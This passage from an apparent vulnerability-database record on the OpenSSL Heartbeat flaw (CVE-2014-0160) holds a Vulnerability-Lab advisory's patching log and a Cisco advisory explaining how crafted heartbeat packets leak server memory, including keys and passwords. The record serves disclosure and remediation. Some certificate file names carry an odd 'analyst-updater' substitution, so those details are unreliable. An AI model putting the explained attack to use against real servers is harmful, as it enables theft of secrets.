ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [140 kB]\r\nGet:53 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq-dev amd64 9.1.13-0ubuntu0.12.04 [215 kB]\r\nGet:54 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq5 amd64 9.1.13-0ubuntu0.12.04 [93.0 kB]\r\nGet:55 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main linux-firmware all 1.79.11 [27.7 MB]\r\nGet:56 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5 all 5.3.10-1ubuntu3.11 [1,076 B]\r\nGet:57 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-9.1 amd64 9.1.13-0ubuntu0.12.04 [4,307 kB]\r\nGet:58 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-client-9.1 amd64 9.1.13-0ubuntu0.12.04 [959 kB]\r\nGet:59 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udisks amd64 1.0.4-5ubuntu2.2 [250 kB]\r\nFetched 108 MB in 26s (4,140 kB/s)\r\nExtract templates from packages: 100%\r\nPreconfiguring packages ...\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libssl-doc 1.0.1-4ubuntu5.11 (using .../libssl-doc_1.0.1-4ubuntu5.12_all.deb) ...\r\nUnpacking replacement libssl-doc ...\r\nPreparing to replace libssl-dev 1.0.1-4ubuntu5.11 (using .../libssl-dev_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement libssl-dev ...\r\nPreparing to replace libssl1.0.0 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nDe-configuring libssl1.0.0:i386 ...\r\nUnpacking replacement libssl1.0.0 ...\r\nPreparing to replace libssl1.0.0:i386 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_i386.deb) ...\r\nUnpacking replacement libssl1.0.0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up libssl1.0.0 (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl1.0.0:i386 (1.0.1-4ubuntu5.12) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libudev0:i386 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libudev0 ...\r\nUnpacking replacement libudev0:i386 ...\r\nPreparing to replace libudev0 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libudev0 ...\r\nSetting up libudev0:i386 (175-0ubuntu9.5) ...\r\nSetting up libudev0 (175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libgtk-3-bin 3.4.2-0ubuntu0.6 (using .../libgtk-3-bin_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nLeaving \\'diversion of /usr/sbin/update-icon-caches to /usr/sbin/update-icon-caches.gtk2 by libgtk-3-bin\\'\r\nLeaving \\'diversion of /usr/share/man/man8/update-icon-caches.8.gz to /usr/share/man/man8/update-icon-caches.gtk2.8.gz by libgtk-3-bin\\'\r\nUnpacking replacement libgtk-3-bin ...\r\nPreparing to replace libgtk-3-0 3.4.2-0ubuntu0.6 (using .../libgtk-3-0_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nUnpacking replacement libgtk-3-0 ...\r\nPreparing to replace libgtk-3-common 3.4.2-0ubuntu0.6 (using .../libgtk-3-common_3.4.2-0ubuntu0.7_all.deb) ...\r\nUnpacking replacement libgtk-3-common ...\r\nPreparing to replace libgudev-1.0-0:i386 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libgudev-1.0-0 ...\r\nUnpacking replacement libgudev-1.0-0:i386 ...\r\nPreparing to replace libgudev-1.0-0 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libgudev-1.0-0 ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for libglib2.0-0 ...\r\nProcessing triggers for libglib2.0-0:i386 ...\r\nSetting up libgudev-1.0-0:i386 (1:175-0ubuntu9.5) ...\r\nSetting up libgudev-1.0-0 (1:175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libnss3-1d 3.15.4-0ubuntu0.12.04.1 (using .../libnss3-1d_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3-1d ...\r\nPreparing to replace libnss3:i386 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_i386.deb) ...\r\nDe-configuring libnss3 ...\r\nUnpacking replacement libnss3:i386 ...\r\nPreparing to replace libnss3 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3 ...\r\nSetting up libnss3:i386 (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up libnss3 (3.15.4-0ubuntu0.12.04.2) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace librsvg2-common:i386 2.36.1-0ubuntu1 (using .../librsvg2-common_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-common:i386 ...\r\nPreparing to replace librsvg2-2:i386 2.36.1-0ubuntu1 (using .../librsvg2-2_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-2:i386 ...\r\nPreparing to replace file 5.09-2ubuntu0.2 (using .../file_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement file ...\r\nPreparing to replace libmagic1 5.09-2ubuntu0.2 (using .../libmagic1_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement libmagic1 ...\r\nPreparing to replace tzdata-java 2013g-0ubuntu0.12.04 (using .../tzdata-java_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata-java ...\r\nPreparing to replace tzdata 2013g-0ubuntu0.12.04 (using .../tzdata_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata ...\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up tzdata (2014a-0ubuntu0.12.04) ...\r\n\r\nCurrent default time zone: \\'Etc/GMT\\'\r\nLocal time is now: Wed Apr 9 12:04:24 GMT 2014.\r\nUniversal Time is now: Wed Apr 9 12:04:24 UTC 2014.\r\nRun \\'dpkg-reconfigure tzdata\\' if you wish to change it.\r\n\r\n(Reading database ... 159289 files and directories currently installed.)\r\nPreparing to replace php5-cgi 5.3.10-1ubuntu3.10 (using .../php5-cgi_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cgi ...\r\nPreparing to replace openssl 1.0.1-4ubuntu5.11 (using .../openssl_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement openssl ...\r\nPreparing to replace apache2-prefork-dev 2.2.22-1ubuntu1.4 (using .../apache2-prefork-dev_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-prefork-dev ...\r\nPreparing to replace apache2 2.2.22-1ubuntu1.4 (using .../apache2_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2 ...\r\nPreparing to replace apache2-mpm-prefork 2.2.22-1ubuntu1.4 (using .../apache2-mpm-prefork_2.2.22-1ubuntu1.5_amd64.deb) ...\r\n * Stopping web server apache2 ... waiting . [ OK ]\r\nUnpacking replacement apache2-mpm-prefork ...\r\nPreparing to replace apache2.2-common 2.2.22-1ubuntu1.4 (using .../apache2.2-common_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-common ...\r\nPreparing to replace apache2.2-bin 2.2.22-1ubuntu1.4 (using .../apache2.2-bin_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-bin ...\r\nPreparing to replace apache2-utils 2.2.22-1ubuntu1.4 (using .../apache2-utils_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-utils ...\r\nPreparing to replace libapache2-mod-php5 5.3.10-1ubuntu3.10 (using .../libapache2-mod-php5_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement libapache2-mod-php5 ...\r\nPreparing to replace php5-mysql 5.3.10-1ubuntu3.10 (using .../php5-mysql_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-mysql ...\r\nPreparing to replace php5-xsl 5.3.10-1ubuntu3.10 (using .../php5-xsl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-xsl ...\r\nPreparing to replace php5-curl 5.3.10-1ubuntu3.10 (using .../php5-curl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-curl ...\r\nPreparing to replace php5-gd 5.3.10-1ubuntu3.10 (using .../php5-gd_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-gd ...\r\nPreparing to replace php5-cli 5.3.10-1ubuntu3.10 (using .../php5-cli_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cli ...\r\nPreparing to replace php5-sqlite 5.3.10-1ubuntu3.10 (using .../php5-sqlite_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-sqlite ...\r\nPreparing to replace php5-common 5.3.10-1ubuntu3.10 (using .../php5-common_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-common ...\r\nPreparing to replace icedtea-6-jre-cacao 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-cacao_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-cacao ...\r\nPreparing to replace openjdk-6-jre-lib 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-lib_6b30-1.13.1-1ubuntu2~0.12.04.3_all.deb) ...\r\nUnpacking replacement openjdk-6-jre-lib ...\r\nPreparing to replace icedtea-6-jre-jamvm 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-jamvm_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-jamvm ...\r\nPreparing to replace openjdk-6-jre-headless 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-headless_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement openjdk-6-jre-headless ...\r\nPreparing to replace sudo 1.8.3p1-1ubuntu3.4 (using .../sudo_1.8.3p1-1ubuntu3.6_amd64.deb) ...\r\nUnpacking replacement sudo ...\r\nPreparing to replace ifupdown 0.7~beta2ubuntu10 (using .../ifupdown_0.7~beta2ubuntu11_amd64.deb) ...\r\nUnpacking replacement ifupdown ...\r\nPreparing to replace initramfs-tools 0.99ubuntu13.4 (using .../initramfs-tools_0.99ubuntu13.5_all.deb) ...\r\nUnpacking replacement initramfs-tools ...\r\nPreparing to replace initramfs-tools-bin 0.99ubuntu13.4 (using .../initramfs-tools-bin_0.99ubuntu13.5_amd64.deb) ...\r\nUnpacking replacement initramfs-tools-bin ...\r\nPreparing to replace udev 175-0ubuntu9.4 (using .../udev_175-0ubuntu9.5_amd64.deb) ...\r\nAdding \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev\\'\r\nUnpacking replacement udev ...\r\nPreparing to replace ca-certificates 20111211 (using .../ca-certificates_20130906ubuntu0.12.04.1_all.deb) ...\r\nUnpacking replacement ca-certificates ...\r\nPreparing to replace openssh-server 1:5.9p1-5ubuntu1.1 (using .../openssh-server_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-server ...\r\nPreparing to replace openssh-client 1:5.9p1-5ubuntu1.1 (using .../openssh-client_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-client ...\r\nPreparing to replace libclamav6 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../libclamav6_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement libclamav6 ...\r\nPreparing to replace clamav-base 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-base_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_all.deb) ...\r\nUnpacking replacement clamav-base ...\r\nPreparing to replace clamav-freshclam 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-freshclam_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\n * Stopping ClamAV virus database updater freshclam [ OK ]\r\nUnpacking replacement clamav-freshclam ...\r\nPreparing to replace clamav 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement clamav ...\r\nPreparing to replace libpq-dev 9.1.12-0ubuntu0.12.04 (using .../libpq-dev_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq-dev ...\r\nPreparing to replace libpq5 9.1.12-0ubuntu0.12.04 (using .../libpq5_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq5 ...\r\nPreparing to replace linux-firmware 1.79.10 (using .../linux-firmware_1.79.11_all.deb) ...\r\nUnpacking replacement linux-firmware ...\r\nPreparing to replace php5 5.3.10-1ubuntu3.10 (using .../php5_5.3.10-1ubuntu3.11_all.deb) ...\r\nUnpacking replacement php5 ...\r\nPreparing to replace postgresql-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\n * Stopping PostgreSQL 9.1 database server [ OK ]\r\nUnpacking replacement postgresql-9.1 ...\r\nPreparing to replace postgresql-client-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-client-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement postgresql-client-9.1 ...\r\nPreparing to replace udisks 1.0.4-5ubuntu2.1 (using .../udisks_1.0.4-5ubuntu2.2_amd64.deb) ...\r\nUnpacking replacement udisks ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for ureadahead ...\r\nProcessing triggers for ufw ...\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nSetting up libssl-doc (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl-dev (1.0.1-4ubuntu5.12) ...\r\nSetting up libgtk-3-common (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-0 (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-bin (3.4.2-0ubuntu0.7) ...\r\nSetting up libnss3-1d (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up librsvg2-2:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up librsvg2-common:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up libmagic1 (5.09-2ubuntu0.3) ...\r\nSetting up file (5.09-2ubuntu0.3) ...\r\nSetting up tzdata-java (2014a-0ubuntu0.12.04) ...\r\nSetting up php5-common (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-cgi (5.3.10-1ubuntu3.11) ...\r\nSetting up openssl (1.0.1-4ubuntu5.12) ...\r\nSetting up apache2.2-bin (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-utils (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2.2-common (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-prefork-dev (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-mpm-prefork (2.2.22-1ubuntu1.5) ...\r\n * Starting web server apache2 [ OK ]\r\nSetting up apache2 (2.2.22-1ubuntu1.5) ...\r\nSetting up libapache2-mod-php5 (5.3.10-1ubuntu3.11) ...\r\n * Reloading web server config apache2 [ OK ]\r\nSetting up php5-cli (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-mysql (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-xsl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-curl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-gd (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-sqlite (5.3.10-1ubuntu3.11) ...\r\nSetting up sudo (1.8.3p1-1ubuntu3.6) ...\r\nInstalling new version of config file /etc/init.d/sudo ...\r\nSetting up ifupdown (0.7~beta2ubuntu11) ...\r\nSetting up initramfs-tools-bin (0.99ubuntu13.5) ...\r\nSetting up ca-certificates (20130906ubuntu0.12.04.1) ...\r\nUpdating certificates in /etc/ssl/certs... 21 added, 9 removed; done.\r\nRunning hooks in /etc/ca-certificates/update.d....\r\nAdding debian:Actalis_Authentication_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_2_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_3_analyst-updater_CA.pem\r\nAdding debian:CA_Disig_analyst-updater_R1.pem\r\nAdding debian:CA_Disig_analyst-updater_R2.pem\r\nAdding debian:China_Internet_Network_Information_Center_EV_Certificates_analyst-updater.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_2009.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_EV_2009.pem\r\nAdding debian:EC-ACC.pem\r\nAdding debian:EE_Certification_Centre_analyst-updater_CA.pem\r\nAdding debian:Hellenic_Academic_and_Research_Institutions_analyst-updaterCA_2011.pem\r\nAdding debian:PSCProcert.pem\r\nAdding debian:Security_Communication_analyst-updaterCA2.pem\r\nAdding debian:StartCom_Certification_Authority_2.pem\r\nAdding debian:StartCom_Certification_Authority_G2.pem\r\nAdding debian:Swisscom_analyst-updater_CA_2.pem\r\nAdding debian:Swisscom_analyst-updater_EV_CA_2.pem\r\nAdding debian:Trustis_FPS_analyst-updater_CA.pem\r\nAdding debian:T-TeleSec_Globalanalyst-updater_Class_3.pem\r\nAdding debian:TURKTRUST_Certificate_Services_Provider_analyst-updater_2007.pem\r\nAdding debian:Verisign_Class_3_Public_Primary_Certification_Authority_2.pem\r\nRemoving debian:cacert.org.pem\r\nRemoving debian:ca.pem\r\nRemoving debian:Equifax_Secure_eBusiness_CA_2.pem\r\nRemoving debian:TC_TrustCenter_Universal_CA_III.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_2_CA.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_3_CA.pem\r\nRemoving debian:Verisign_Class_2_Public_Primary_Certification_Authority.pem\r\nRemoving debian:Verisign_Class_4_Public_Primary_Certification_Authority_-_G2.pem\r\nRemoving debian:spi-ca-2003.pem\r\ndone.\r\ndone.\r\nSetting up openssh-client (1:5.9p1-5ubuntu1.3) ...\r\nSetting up openssh-server (1:5.9p1-5ubuntu1.3) ...\r\nssh stop/waiting\r\nssh start/running, process 14149\r\nSetting up libclamav6 (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up clamav-base (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nReplacing config file /etc/clamav/clamd.conf with new version\r\nSetting up clamav-freshclam (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nInstalling new version of config file /etc/init.d/clamav-freshclam ...\r\nReplacing config file /etc/clamav/freshclam.conf with new version\r\n * Starting ClamAV virus database updater freshclam [ OK ]\r\nSetting up clamav (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up libpq5 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up libpq-dev (9.1.13-0ubuntu0.12.04) ...\r\nSetting up linux-firmware (1.79.11) ...\r\nSetting up php5 (5.3.10-1ubuntu3.11) ...\r\nSetting up postgresql-client-9.1 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up postgresql-9.1 (9.1.13-0ubuntu0.12.04) ...\r\n * Starting PostgreSQL 9.1 database server [ OK ]\r\nSetting up openjdk-6-jre-headless (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up openjdk-6-jre-lib (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up icedtea-6-jre-cacao (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up icedtea-6-jre-jamvm (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up udev (175-0ubuntu9.5) ...\r\nudev stop/waiting\r\nudev start/running, process 16013\r\nRemoving \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev\\'\r\nupdate-initramfs: deferring update (trigger activated)\r\nSetting up udisks (1.0.4-5ubuntu2.2) ...\r\nSetting up initramfs-tools (0.99ubuntu13.5) ...\r\nupdate-initramfs: deferring update (trigger activated)\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for initramfs-tools ...\r\nupdate-initramfs: Generating /boot/initrd.img-3.2.0-60-generic\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nErrors were encountered while processing:\r\n bind9\r\nE: Sub-process /usr/bin/dpkg returned an error code (1)\r\nanalyst-updater@h2072833:~# ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE \\'/libssl\\\\.so.* \\\\(deleted\\\\)\\' {} \\\\; | cut -d/ -f3 | sort -u)\r\nERROR: List of process IDs must follow p.\r\n********* simple selection ********* ********* selection by list *********\r\n-A all processes -C by command name\r\n-N negate selection -G by real group ID (supports names)\r\n-a all w/ tty except session leaders -U by real user ID (supports names)\r\n-d all except session leaders -g by session OR by effective group name\r\n-e all processes -p by process ID\r\nT all processes on this terminal -s processes in the sessions given\r\na all w/ tty, including other users -t by tty\r\ng OBSOLETE -- DO NOT USE -u by effective user ID (supports names)\r\nr only running processes U processes for specified users\r\nx processes w/o controlling ttys t by tty\r\n*********** output format ********** *********** long options ***********\r\n-o,o user-defined -f full --Group --User --pid --cols --ppid\r\n-j,j job control s signal --group --user --sid --rows --info\r\n-O,O preloaded -o v virtual memory --cumulative --format --deselect\r\n-l,l long u user-oriented --sort --tty --forest --version\r\n-F extra full X registers --heading --no-heading --context\r\n ********* misc options *********\r\n-V,V show version L list format codes f ASCII art forest\r\n-m,m,-L,-T,H threads S children in sum -y change -l format\r\n-M,Z security data c true command name -c scheduling class\r\n-w,w wide output n numeric WCHAN,UID -H process hierarchy\r\nanalyst-updater@h2072833:~# ls -l /proc/*/fd | grep ssl.*(deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 2012\r\nanalyst-updater@h2072833:~# sudo reboot\r\n\r\nBroadcast message from analyst-updater@h2072833.ben-kenobi-server.net\r\n (/dev/pts/0) at 12:16 ...\r\n\r\nThe system is going down for reboot NOW!\r\n\r\n\r\n\r\nPicture(s):\r\nhttp://www.vulnerability-lab.com/resources/pictures/1.png\r\nhttp://www.vulnerability-lab.com/resources/pictures/2.png\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com \t- support@vulnerability-lab.com \t - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com \t- forum.vulnerability-lab.com \t\t - news.vulnerability-lab.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n \t\t\t\t \tCopyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisco": [{"lastseen": "2019-05-29T15:32:56", "bulletinFamily": "software", "description": "A vulnerability in the Transport Layer Security (TLS)/Datagram Transport Layer Security (DTLS) heartbeat functionality in OpenSSL used in multiple Cisco products could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the TLS heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or DTLS client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. The attacker could then send a specially-crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nFunctional code that exploits this vulnerability is available as part of the Metasploit framework.\n\nOpenSSL has confirmed the vulnerability and released software updates.\n\nAn attacker could exploit this vulnerability to access memory from an application that uses an affected version of OpenSSL in chunks of 64k; however, repeated exploitation could allow the attacker to retrieve additional memory to further retrieve sensitive information. However, widespread attacks have not been detected or reported.\n\nA secondary impact of the vulnerability, the compromise of certificate secret key information, could allow attackers to decrypt captured network traffic, whether stored or in transit. Attackers also require a privileged position in the network to capture network traffic, increasing the difficulty of leveraging information gained from exploits against the vulnerability.\n\nIf sites are using SSL certificates for authentication, attackers could use stolen secret keys to impersonate a trusted host, possibly for use as part of phishing or spoofing attacks.\n\nCVSS temporal scoring metrics on this vulnerability reflect software products affected by the vulnerability that have no available software updates. Products with available software updates have a reduced temporal score.", "modified": "2014-07-09T16:11:35", "published": "2014-04-08T14:39:29", "id": "CISCO-SA-20140408-CVE-2014-0160", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140408-CVE-2014-0160", "type": "cisco", "title": "OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
